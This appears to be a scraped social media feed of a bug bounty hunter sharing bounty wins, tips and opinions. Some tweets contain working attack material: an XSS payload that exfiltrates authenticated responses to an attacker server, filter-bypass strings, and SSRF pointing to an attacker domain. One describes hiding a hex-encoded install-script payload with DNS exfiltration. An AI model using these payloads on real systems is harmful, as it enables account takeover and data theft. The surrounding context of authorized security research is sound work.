#1 Hacker at BugCon LHE Mexico 2021 & 2022 | Top Ranked in H1 Mexico Leaderboard 2021, 2022, 2023, 2024 | Security Engineering Specialist | Co-Founder @ Ryft

127.0.0.1
Pinned Tweet
Yay, I was awarded a $16,300 bounty on @Hacker0x01! hackerone.com/moblig #TogetherWeHitHarder 🎉🎉🎉 Tip: Even if an asset asks for authentication, fuzz for endpoints using ffuf, I found an unauthenticated API that allowed me to retrieve sensitive information!
43
85
1,152
$15k+ Worth of IDORs in the past couple of months; it takes a lot of manual verification, but use this regex in BurpSuite in order to filter out potential parameters: (?i)\b\w*id\b(?!\w)\s*=\s*("[^"]*"|'[^']*'|[^&\s}]*) #bugbountytips #CyberSecurity
36
364
1,407
125,350
Yay, I was awarded a $15,000 bounty on @Hacker0x01! The program was running a 3x campaign and had an average of 0% critical vulnerabilities. An unusual combination of persistent tokens and good ol' Google Dorking. I will be doing a write-up for this one when it is resolved, and will also be disclosing my most interesting reports here, so drop a follow :) 👇 medium.com/@moblig #bugbountytips #bugbounty #CyberSecurity
34
53
901
40,751
Yay, I was awarded a $10,000 bounty on @Hacker0x01! For a Critical Severity IDOR. Tip: 1) In-depth knowledge of the program, lots of manual testing 2) Learning to master the 'Autorize' extension for Burp Automated & manual testing🤝 #bugbountytip #hackerone
27
86
770
53,744
$10,000 for RCE through Dependency Confusion, this time on one of my first submissions in @intigriti 🙌 I spent a whole month learning and developing a custom tool using Next.js, this helped me identify and exploit the RCE. Of course, I also used: medium.com/@alex.birsan/depe…
33
68
688
30,250
Yay, I was awarded a $4,500 bounty on @Hacker0x01! Tip: Target had a /?back= parameter, but payloads like javascript://alert(1) did not work. Exploited using the following with URL-encoded ASCII tab characters: %09Jav%09ascript:alert(document.domain) #bugbountytips #bugbounty
19
134
641
43,355
Some fun & unexpected bugs I found recently👇 1. Authentication Bypass by setting session cookie value to 'null' 2. Plain text credentials in JS files expose clients' PII Haven't found a write-up about the null cookie approach before, and the exposed credentials, just, wow...
22
106
637
29,927
I often find IDORs by searching in JS Files for interesting endpoints, but how do I automate this while also performing manual hunting?🤔 #bugbountytips I mostly use my custom @trick3st workflow for finding unique domains & secrets in JS files, here is how it works👇 1/4
14
148
571
48,719
Yay, I was awarded a $10,000 bounty on @Hacker0x01! hackerone.com/moblig #TogetherWeHitHarder #bugbountytip DOM XSS to Admin Account Takeover - No CORS policy so I was able to send authenticated requests on behalf of the victim and send the response back to my server. 👇
14
32
452
31,503
I was awarded $7,666 for a Critical XSS Reflected XSS, but no particular sensitive data was exposed. Here is how I was able to escalate to account takeover👇 #bugbountytips
17
78
446
25,418
$5,000 for 5 IDORS on the same asset! All manual findings, although for some of these I used the ‘Reflection’ extension in Burp in order to find more parameters vulnerable to IDOR #bugbountytips #hackerone
12
55
434
31,322
Yay, I was awarded a $4,000 bounty on @Hacker0x01! For XSS to ATO Instead of a #bugbountytip, here is the code snippet used to check the user-supplied input in this specific parameter, who can tell me what the problem here was, and what a potential bypass would look like?
14
26
433
28,411
Feels good to be back!🙌 Using this beauty again to bypass the fix for an XSS to ATO: %09Jav%09ascript:alert(1) #bugbountytips #togetherwehitharder #hackerone PS. If anyone is going to @defcon and wants to meet, I'll be in Vegas Aug 6-10! :) Attending @Hacker0x01 recharge too.
12
39
434
20,195
I was awarded a $10,000 bounty by the @GoogleVRP Cloud Program!👌 I've recently shifted my focus to server-side and broken access control vulnerabilities, and I have to say it has paid off. It was a S0-P0, but the impact was limited, which is why they downgraded the bounty. #bugbountytips
26
21
418
17,987
$4,000 for Bypassing WAF Tip: Whenever an asset is protected by a WAF, enumerate and investigate subdomains and IP Addresses, sometimes you’ll find dev or staging environments which are exact copies of production. target.xyz -> WAF https://69.420.69.420:443 - No WAF
15
66
394
Yay, I was awarded a $4,500 bounty on @Hacker0x01! XSS to ATO through exposed CSRF Tokens Tip: If cookies are HTTP only, search for exposed CSRF tokens, you can append them to your CSRF PoC: xhr.setRequestHeader("X-Csrf-Token", "3983xn9n"); #bugbountytips Read first comment👇
9
64
362
28,679
A month ago, I was able to access Microsoft's ServiceNow instance, exposing ALL Microsoft Employee emails, Chat Support Transcripts & Attachments. The write-up and my take on the state of the MSRC is now available here👇 link.medium.com/L54B9nGtXNb #bugbountytips #CybersecurityNews #microsoft
7
74
355
21,886
Yay, I was awarded a $4,000 bounty on @Hacker0x01! hackerone.com/moblig #TogetherWeHitHarder I think we all guessed what this was for, right?
5
19
344
I just published "Exposing PII and SSNs through Persistent Session Tokens - $15,000 Bug Bounty" a new write-up in which I describe: - My throught process - My approach when hacking in program campaigns - Technical details of the vulnerability shorturl.at/9X9H8 #bugbountytips
10
67
336
17,573
Yay, I was awarded a $4,000 bounty on @Hacker0x01! hackerone.com/moblig #TogetherWeHitHarder For Reflected XSS to Account Takeover Tip: When cookies are HTTP only go for localStorage -- alert(JSON.stringify(localStorage));
5
42
292
Yay, I was awarded a $2,000 bounty on @Hacker0x01! hackerone.com/moblig #TogetherWeHitHarder This reponse time is literally every BugHunter's dream😮 Bug: IDOR by manually adding the parameter "user_id" to the JSON request #bugbountytips
11
18
271
I know they were pissed after bypassing the fix for the third time lol Needless to say, they removed the asset from scope #bugbounty
15
9
255
14,670
An API is calling your own records like this? -> GET /v1/transactions/all See if the response contains and object with an ID and reference it directly -> GET /v1/transactions/813 If you get a 200 OK, check if you can access any record ID for an IDOR! #bugbountytips
6
62
238
Yay, I was awarded a $1,500 bounty on @Hacker0x01! hackerone.com/moblig #TogetherWeHitHarder SSRF by appending /param?url=burpcollab.com Access to internal resources but escalated to ATO by pointing the param to an XSS payload /param?url=4tt4ck3r.com/xss.html
6
33
219
Yay, I was awarded a $2,000 bounty on @Hacker0x01! Tip: If user IDs are predictable, try different features in the platform that expose user info, in my case I could add people to a team, therefore I could guess all user IDs with intruder and expose their info #bugbountytips
8
17
221
Yay, I was awarded a $3,000 bounty on @Hacker0x01! hackerone.com/moblig #TogetherWeHitHarder Blind XSS through Support Chat leads to ATO, forging requests on behalf of the victim using Fetch & sending the response to the attacker server (payload below👇🏻👇🏻👇🏻)
8
23
178
Yay, I was awarded a $1,500 bounty on @Hacker0x01! hackerone.com/moblig #TogetherWeHitHarder First time seeing an SSRF lead to an account takeover by itself, I might consider a writeup for this one because of its weird nature, also some kind words :)
7
6
179
Why do you have to do me like that lol #bugbounty
9
10
172
12,606
You can never have enough swag @Hacker0x01
2
4
142
Taking a break from #hacking and hitting the slopes in the US🇺🇸 I am working on some write-ups on Medium as well so stay tuned🙌🏻
4
1
122
5,923
One of the first critical bounties of my career was because of The Wayback Machine and the amazing resources they have and these idiots trying to take it down because of unrelated politics? Amazing👍🏻
The Internet archive has and is suffering from a devastating attack We have been launching several highly successful attacks for five long hours and, to this moment, all their systems are completely down. second round | New attack 09/10/2024 Duration 6 hours check-host.net/check-report/… check-host.net/check-report/… check-host.net/check-report/… check-host.net/check-report/… @internetarchive : be honest :)
Community note
This group conducted Denial of Service (DDOS) attack on Internet Archive, which is a 501c Non-Profit, Public Charity and Non-Governmental Organization found by Kahle Brewster in 1996, and has nothing to do with US Govt, CIA, Israel, MOSSAD and counter-terrorism. state.gov/non-government… irs.gov/charities-non-… irs.gov/charities-non-… apps.irs.gov/pub/epostcard/
4
10
110
9,482
Yay, I was awarded a $2,500 bounty on @Hacker0x01! hackerone.com/moblig #TogetherWeHitHarder First one of the year and last report regarding Log4j!
4
4
101
Turns out #BugBounty is not the only thing I am half-decent at.😅 These are my returns on my entire portfolio, which I started out 9 months ago. I handpicked the stocks and spent a reasonable amount of time studying each one. The best stock is up 496%.😮‍💨
5
92
5,403
From now on, please refer to me as Genius Hacker, thanks.
4
5
82
You get a cute ‘Thank you’ note when reporting vulnerabilities to a company valued at 1.5 Trillion Dollars🥰 #bugbounty
6
1
81
14,929
Replying to @maxdha1
Filter Settings in Proxy Tab, or directly in the request analyzer
1
9
82
4,301
4) Build the payload using the GraphQL query: (payload doesn't fit in a tweet)
3
7
84
3,971
A quote from my 10k XSS report, this is why you have to use irrefutable facts when trying to demonstrate impact:
I got $66000 once for an XSS. The impact to the business and its users is the important thing in a report and not the bug itself.
2
6
79
12,886
"><img src="x"onerror="fetch('https://target/x',{method:'get',credentials:'include',headers:{'Content-Type':'application/json'}}).then(response => response.text()).then(data =>{var xhr=new XMLHttpRequest();xhr.open('POST','https://myserver/a');xhr.send(data);});">
6
14
70
Getting a duplicate on @Hacker0x01 hurts, but getting a duplicate on a bug worth 10k is actually depressing😔 #bugbounty
5
67
Well this was an interesting one🤔 $500 Bounty from the @mozilla Bug Bounty! Same tip as my last bounty, FFUF and keep updating your wordlists! I have no idea how to redeem this though lol #bugbountytips
7
4
63
All that is left to do is analyze the results, and hopefully find exposed secrets & interesting endpoints to target for IDORs or other bugs! :) You can find the JSON for the workflow, which you can copy & paste into @trick3st UI here: github.com/moblig/Trickest/b…
1
5
62
4,653
Getting this message from a program is great, but getting a compliment from a triager hits different lol #bugbounty
4
1
57
5,453
Replying to @bug_vs_me
This is the part that applies to this specific scenario, taken from hacken.io/researches-and-inv…
3
9
58
$1,500 for a vulnerability initially marked as “Not Applicable” by a triager, the tip today isn’t a technical one, rather than an advice — Triagers do not have the last word, always ask for the client to be consulted and provide irrefutable evidence! #bugbountytips #bugbounty
I just found and reported 3 vulnerabilities affecting the same product used by 3 different companies, 2 of them have been accepted as High on @Hacker0x01 and the 3rd marked as "Not Applicable" on Bugcrowd 😂This is why I never hack on Bugcrowd #bugbounty
3
3
53
Mil gracias a @BugCON por la invitacion y oportunidad de presentar mi charla, fue un placer!🇲🇽 The slides from the presentation will be published soon in both english and spanish✅ #bugbountytips
3
3
57
2,997
Delighted to announce I will be presenting my research at @BugCON in Mexico City!🇲🇽 -- Un placer anunciar que estare presentando mi investigación en @BugCON en Ciudad de Mexico!🇲🇽 #bugbounty #cybersecurity
🚨 Speaker Alert: imagina comprar el boleto más barato para el último concierto de @belindapop y poder colarte, hasta poder saludarla en persona. ¿Imposible?, @moblig_ lo hace realidad en el maintrack de #BugCON 2024 🇲🇽🌮
8
3
54
4,956
Replying to @bxmbn
I still don't understand how people value their time so poorly that they are willing to work for free. Go do CTFs instead
5
1
51
3,451
I just found and reported 3 vulnerabilities affecting the same product used by 3 different companies, 2 of them have been accepted as High on @Hacker0x01 and the 3rd marked as "Not Applicable" on Bugcrowd 😂This is why I never hack on Bugcrowd #bugbounty
4
1
46
Replying to @Bhavinexplains
1. Single web app in scope so a lot of manual work and learning all the features 2. Once I find a vulnerable parameter I search for similar params using Reflected Parameters extension or with Logger using the regex\?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])
2
9
55
2,329
The PoC URL required an SID every time, so I had to create a Python script that would generate a new SID and append it to the PoC URL, the final payload looked like this redacted.com/redacted/path/v…(`<base64-encoded-code>`)); And the code used inside the atob function
2
45
2,188
Not the first time he has been accused of scamming people
One more example for bad behavior / Scam in paid subscription for bugbounty santimillionaire.com/ I was there for the last 5 months trying to find something useful but unfortunately nothing , just a ready payloads and some tips filtered for each bug and this month I found a interesting script with lot of installing issues , and when I asked for help , he’s keep ignoring Nothin new in the last 5 months , so it should be one time payment payments should be 20$ and this month they took 40$ Just cancel the auto payment as Iam always trying to show everything good in bugbounty tips and sure for free, In the same time I will drop the bad content like this as well #bugbountyScam
1
1
42
5,976
Replying to @0xUchihamrx
Crawl using Burp + navigating web app manually, also use gau and filter out for URLs paths that only have query parameters, you can always find potential parameters there, if an ID is easily guessable try for IDOR
1
5
44
3,625
Estare dando mi charla "Backstage Pass: Leveraging Unauthenticated APIs to Breach Internal Infrastructure " mañana en @BugCON🇲🇽 a las 9 AM. Los espero!
2
4
39
2,432
Great question here! The main difference I found was not putting your payload directly in the preinstall parameter of your package.json, instead use 'node preinstall.json' and put your payload in the preinstall.json file, I also hex encoded the data and used DNS exfiltration
2
2
40
2,268
I am at @ekoparty this week in Buenos Aires🇦🇷and then next week in Mexico City for @BugCON 🇲🇽
3
36
2,546
In this case, the CSRF token was exposed through a non-HTTP cookie and also the DOM, they expired after 24 hours so plenty of time to abuse them. I was initially paid 625 for this report, and after review, I was given the rest of the 4,500
1
33
2,730
Never thought I'd see the day...#Verified
1
33
While this is certainly true, these numbers also highlight the disproportionate compensation that some bug bounty hunters experience when reporting critical bugs. It is also necessary to advocate for fair compensation when promoting the adoption of bug bounty programs🐞 #bugbountytips
Security costs money. Lack of security costs 1000X.
3
32
4,226
Nothing better than receiving personalized private invites! Makes you want to invest some extra effort on the program. @Hacker0x01
1
1
33
Room view in Vegas @defcon
3
1
30
2,201
The XSS could only retrieve non-HTTP cookies, so here is what I did: 1) I found a GraphQL endpoint (POST /graphql_service), that retrieved the user's auth token. So, how can I steal the token? 2) I tried transforming the POST query to a GET query in order to use it in my payload
1
1
31
2,917
The second part grabs the results & searches JS files using getjs, the results are then passed to Cariddi which crawls the URLs & scans for endpoints, secrets, API keys, file extensions, tokens, and more. Linkfinder is used to extract endpoints & params from the JS files. 3/4
3
28
4,530
Vegas was amazing!
1
25
2,270
Replying to @Hacker0x01
Although the right move, it's also sad for the Russian bug hunters and companies who have to endure the consequences of their leader's decisions.
1
26
The first part does a thorough subdomain scan of the desired targets, using multiple sources like Github & Shodan and tools like subfinder, vita & assetfinder. It then goes deeper by performing level-deep subdomain scans with puredns 2/4
1
1
28
3,664
I now have a working GET GraphQL query, but how can I expose the response that includes the auth token? 3) I found that the site also has a CORS misconfig, so I can send requests on behalf of the victim and receive the response on my server
1
1
27
3,502
I've been seeing the same thing with @bugcrowdninja.com handles, huge amount of bug bounty hunter's data leaked🫣
🚨🇺🇸A threat actor likely leaked stealer log data from HackerOne users
2
3
24
3,995
I’ll never understand why programs don’t fix Critical/P1 vulnerabilities for months, like, I’m tired of wasting hours investigating and exploiting vulnerabilities, writing a good report just to get a duplicate on Criticals🙄 #bugbounty
2
2
25
Yay, I was awarded a $15,000 bounty on @Hacker0x01! The program was running a 3x campaign and had an average of 0% critical vulnerabilities. An unusual combination of persistent tokens and good ol' Google Dorking. I will be doing a write-up for this one when it is resolved, and will also be disclosing my most interesting reports here, so drop a follow :) 👇 medium.com/@moblig #bugbountytips #bugbounty #CyberSecurity
2
25
1,924
Haven't seen a new Clear Verified program in a WHILE, yet new VDPs every month. Companies seem to prefer volume over quality now. Here is an interesting fact from H1 customers:
More and more BBPs programs leaving/closing at a crazy rate New VDPs every month Almost 300 Reports in less than a week for this new VDP We are doomed.
1
3
25
7,683
1st Place second year in a row in @Mercadolibre live hacking event! Gracias @BugCON 🥳 por el evento! #bugbounty
3
5
21
If the default is a 200 page instead of a 404, you can use the -fs option to filter HTTP response size. Just look at the response size of that 200 page and use -fs 2456 for example
2
6
21
Completely wrong take, you are actually head hunted if you perform well in Bug Bounty. I've interviewed candidates who do well in Bug Bounty and they perform better than Certs collectors🤷🏻
Replying to @sk1dd13
Been saying this for a while now dude. It's the most true statement ever. Some people think that bug bounties look great on a resume, but the truth is, recruiters don't give a flying shit about them. They don't consider it experience. Not my personal opinion. Just straight facts
3
2
21
7,588
Replying to @bxmbn
They can not do that per their own platform standards docs.hackerone.com/en/articl…
4
1
22
2,814
Extra note: The 2 environments had bi-directional synchronization, so everything a user modified or posted on dev would immediately be reflected on prod and viceversa. So injecting a payload in dev would reflect on prod, but injecting a payload in prod was blocked by the WAF
2
19
Pisses me off that programs can get away with this at @Hacker0x01, what are they going to come with up next? Signing up for an account is considered High attack complexity?😂
1
19
3,491
Yay, I was awarded a $800 bounty on @Hacker0x01! hackerone.com/moblig #TogetherWeHitHarder Second time I was able to leak an entire platform user base including PII. /users/5020 -> 403 Forbidden /users/5020.json -> 200 OK
1
2
19
I then escalated to Account Takeover
3
19
3,065
Replying to @hackermondev
I have never seen this before wtf is -93k, are they charging you for N/A's?😂
3
16
8,687
I've gotten more duplicates this week than In my whole bug bounty career🫠 #bugbounty
16
Spent way too much time chasing client side vulns (XSS for example)
15
1,505
Replying to @gonzxph
You can try different bypasses for internal assets like 127.1 instead of 127.0.0.1, also try URL shortners that point to http://localhost, if none of those work, host a XSS payload which extract localstorage and cookies, there is always juicy information there
1
14
1,882
Replying to @NahamSec @Google
Seeing this gave me so much hope for my report😪
15
1,233
Bypassing the 403 is a vuln by itself but it has to be accompanied by a good PoC, example: accessing sensitive files stored in the server like web.config or nginx.conf. I personally like this 403 Bypass script because I can add my own patterns github.com/iamj0ker/bypass-4…
1
2
14
I hate it when you work for hours investigating and escalating an XSS just for a stupid program to tell you "We take XSS as Medium severity, we have the final word" fucking put it on your brief then so I don't waste my time🙄 #bugbounty
14
Replying to @Hacker0x01
You are absolutely correct, this was an oversight on my part as I took the code after the fix was pushed, the original code did not match for whitespace characters, only for the javascript string, this was the original line: var n = decodeURI(t.modal.getUrlParam('onmodalexit')); Therefore, java%09script worked as well as any new line character. Thanks for pointing this out @voorivex
1
14
1,160
Proud to end the year off by being the #1 Hacker in Mexico’s @Hacker0x01 leaderboard for 15 months straight!#TogetherWeHitHarder
1
12
Replying to @ManasH4rsh
Cherish that feeling you get from your first bounty, you'll never experience the same again!
13
Does anyone know if you can invite a collaborator to a report in a private program, even if the collaborator is not part of the program? #bugbounty
7
1
13
3,486
Thanks @Hacker0x01 for the awesome swag!
1
12
Replying to @campuscodi
It's called retaliaton lol props to the Nvidia team
12